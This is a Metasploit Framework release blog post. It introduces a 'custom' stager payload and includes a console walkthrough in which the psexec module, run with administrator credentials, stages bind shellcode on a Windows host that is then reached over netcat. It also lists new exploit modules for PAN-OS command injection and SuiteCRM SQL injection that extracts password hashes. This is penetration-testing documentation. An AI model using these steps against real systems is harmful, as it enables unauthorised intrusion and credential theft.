Last updated at Tue, 23 Jan 2024 21:56:18 GMT
BYOS: Bring your own stager
We try hard to make sure we have a great choice of fully-functional payloads to choose from, but sometimes you might want to “branch” out on your own, and if that’s the case we’ve got you covered. In an attempt to make Metasploit play well with others, we’ve introduced a brand new payload type: “custom.” “Custom” payloads use Metasploit stagers to build a stager that will stage whatever shellcode you send it.
Got a third-party payload you want to run like Sliver or a payload that’s too big or has too many bad characters to use in an exploit? All you need to do is queue up your exploit of choice in Framework, select the custom payload type, set the shellcode_file
option, and when you launch the exploit, Metasploit will use our stagers to upload and run your custom shellcode on the target.
While we have developed a handler that will send your custom code in, there’s no requirement to use it. You are welcome to write your own handlers: the communication protocol is simply to prepend the shellcode size to the shellcode and send it; the custom payload stager will allocate memory and jump into the shellcode it places in memory.
Here’s an example using traditional “bind shellcode” to get a cmd.exe session on a Windows target:
msf6 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.5.132.159 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Usi
ng-Metasploit
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain . no The Windows domain to use for authentication
SMBPass v3Mpassword no The password for the specified username
SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read
/write folder share
SMBUser Administrator no The username to authenticate as
Payload options (windows/x64/custom/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.5.135.101 yes The listen address (an interface may be specified)
LPORT 4567 yes The listen port
SHELLCODE_FILE x64_shell_bind_4444.bin no Shellcode bin to launch
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 10.5.135.101:4567
[*] 10.5.132.159:445 - Connecting to the server...
<hacking intensifies>
[*] Sending stage (505 bytes) to 10.5.132.159
[+] Custom stage sent; session has been closed
[*] Custom session 1 opened (10.5.135.101:4567 -> 127.0.0.1) at 2022-09-08 15:29:02 -0500
[*] 10.5.132.159 - Custom session 1 closed. Reason: User exit
[+] Custom stage sent; session has been closed
msf6 exploit(windows/smb/psexec) > exit
Now, we can just open a netcat session to the independent bind shell we started on the target:
[ruby-3.0.2@metasploit-framework](upstream-master) tmoose@ubuntu:~/rapid7/metasploit-framework$ nc 10.5.132.159 4444
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::1054:53:8f37:5615%11
IPv4 Address. . . . . . . . . . . : 10.5.132.159
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.5.132.1
Tunnel adapter isatap.{A69D5981-18E2-43CF-982C-D844D6BB7D03}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
Module added to exploit OS Command Injection in PAN-OS
Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7 introduced a new module that exploits an OS Command Injection vulnerability CVE-2020-2038 in PAN-OS. This exploit affects versions of PAN-OS 9.0 up to 9.0.10, 9.1 up to 9.1.4, and 10.0 up to 10.0.1. PAN-OS runs one of the leading enterprise firewalls, Palo Alto Networks next-generation firewall (NGFW). The National Vulnerability Database ranks the severity of this exploit as a high 7.2, as administrators of the system are able to execute arbitrary commands with root privileges. This is due to the API not employing sufficient filtering of input for its "op" request. An excellent writeup on exploiting this vulnerability and other similar vulnerabilities can be found on PT Swarm.
New module content (4)
-
SuiteCRM authenticated SQL injection in export functionality by Exodus Intelligence, Redouane NIBOUCHA, and jheysel-r7 - This adds support for EIP-0f5d2d7f, a vulnerability in the
uid
parameter of theindex.php?entryPoint=export
page on SuiteCRM prior to 7.x prior to 7.12.6 that allows for authenticated SQL injection. The module exploits this SQL injection vulnerability to extract the usernames and password hashes for SuiteCRM users, which can then be cracked offline later to gain access to SuiteCRM. -
Palo Alto Networks Authenticated Remote Code Execution by Mikhail Klyuchnikov, Nikita Abramov, UnD3sc0n0c1d0, and jheysel-r7, which exploits CVE-2020-2038 - This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and version 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.
-
#16521 from bwatters-r7 - This adds a 32-bit and 64-bit custom stage Windows payload. The custom stage allows users to provide their own custom executable code to be delivered as the payload stage in place of Meterpreter, Shell and other Metasploit-provided stages.
-
#16906 from bcoles - This improves the
post/windows/gather/enum_snmp
module with shell and Powershell sessions support as well as fixes issues that low-privileged sessions would run into while reading the registry.
Enhancements and features (5)
- #16911 from bcoles - This adds support for non-Meterpreter sessions and for WOW64 Meterpreter sessions to the
post/windows/gather/enum_ms_product_keys
module. - #16929 from bcoles - The
post/windows/gather/enum_services
module has been updated to support non-Meterpreter sessions, to fix some bugs, and to clean up the code. Additionally documentation has been added on how to use the module. - #16930 from bcoles - This updates the
scripts/resource/dev_checks.rc
resource script to fix issues and add additional module checks. - #16953 from bcoles - The
enum_domain
script has been updated to support Powershell and Shell sessions and its documentation and code have been cleaned up. - #17008 from EmilioPanti -
rpc_core.rb
has been updated so that it now reports the number of evasion modules within Metasploit. Previously this statistic wasn't being reported, whilst other statistics like number of exploit modules, auxiliary modules, and payloads were.
Bugs fixed (5)
- #16928 from bcoles - Multiple bugs have been fixed in the
Msf::Post::Windows::Service
mixin. Additionally, several methods have been adjusted within this mixin so that the data types they use or return are consistent. - #16998 from adfoster-r7 - Fixes a crash in modules using the IAX2 client.
- #17013 from zeroSteiner - This PR enhances
exploit/multi/http/jenkins_script_console
to handle changes to the login process for Jenkins newer than version 2.246. - #17014 from adfoster-r7 - This fixes the
exploit/multi/php/ignition_laravel_debug_rce
module to use the default HTTP timeout for the check method. Without this, the check method would yield false negatives on slower connections. - #17018 from adfoster-r7 - This fixes the
route add
command to use a sensible default netmask.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git
user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).